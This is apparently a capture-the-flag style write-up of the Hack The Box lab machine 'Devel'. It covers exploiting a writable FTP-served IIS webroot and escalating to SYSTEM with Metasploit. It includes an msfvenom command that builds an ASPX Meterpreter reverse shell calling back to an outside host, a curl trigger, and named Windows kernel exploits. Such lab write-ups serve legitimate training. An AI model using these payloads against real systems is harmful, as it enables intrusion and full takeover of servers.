Offensive Security
Offensive Security
About me / contact me
Penetration Testing with Kali
Note taking
Master your skills
OSCP
Information gathering
Gaining Access - Vulnerability Exploitation
Privilege Escalation
HTB
Active
Retired
10.10.10.9 - Bastard
10.10.10.3 - Lame - DistCC, SMB, SSH Reuse
10.10.10.4 - Legacy - WindowsXP samba
10.10.10.5 - Devel - Windows 7
10.10.10.7 - Beep - LFI, Shellshock, SUID
10.10.10.11 - Arctic - LFI, Win2008 Priv Esc
10.10.10.27 - Calamity - php command injection
10.10.10.46 - Apocalyst
10.10.10.51 - SOLID STATE - Apache James, SUID
10.10.10.63 - Jeeves - Jenkins WebServer, SeImpersonatePrivilege
10.10.10.84 - Poison - LFI (Log Poisoning)
VulnHub
Brainpan - 1 - Buffer Overflow
Web Vulnerabilities - OWASP TOP 10
SQL Injection
XXE - XML External Entity
Command Injection
Cross Site Scripting
Broken Authentication and Session Management
Insecure Direct Object References
Cross Site Request Forgery
Security Misconfiguration
Insecure Cryptographic Storage
Insufficient Transport Layer Protection
Other Web Vulnerabilities
Remote File Upload
Remote File Inclusion
Local File Inclusion
Personal Projects
WiFi Penetration Testing
Phishing attempts
News
Powered by GitBook

10.10.10.5 - Devel - Windows 7

ASPX reverse shell and Metasploit Enumeration

Summary: vulnerable software : MSII/7.5 ftp webroot exposed and writable system vulnerable : 10.10.10.5 vulnerability explanation : privilege escalation: kernel pool overflow in Win32k severity : critical

Enumeration:

Nmap shows that Microsoft FTP server is used to provide web content of the wwwroot folder. This can be dangerous if the server allows read and write access to its folder. It seems like it does in this case:

Filezilla showing uploaded shell.aspx crafted by an attacker.

Instructions for creating a shell:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.16 lport=4443 -f aspx > shell.aspx

Once we trigger the uploaded shell we get a connection back from the server:

curl -k http://10.10.10.5/shell.aspx

Next we run local_exploit_suggester to find possible kernel privilege escalation methods on this Windows 7 Box.

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
​

Metasploit exploit_suggester came up with few exploit matching the architecture of the victim:

Metasploit local enumeration

Due to unpatched system being put in place many of the above suggestions were successfully executed on the target providing potential attacker with the NT_AUTHORITY level account:

MS16/075 - Also known as juicy potato
MS13-053

​

Screenshot from 2019-02-18 22-46-45

​

MS14_058
Previous
10.10.10.4 - Legacy - WindowsXP samba
Next
10.10.10.7 - Beep - LFI, Shellshock, SUID
Last updated -8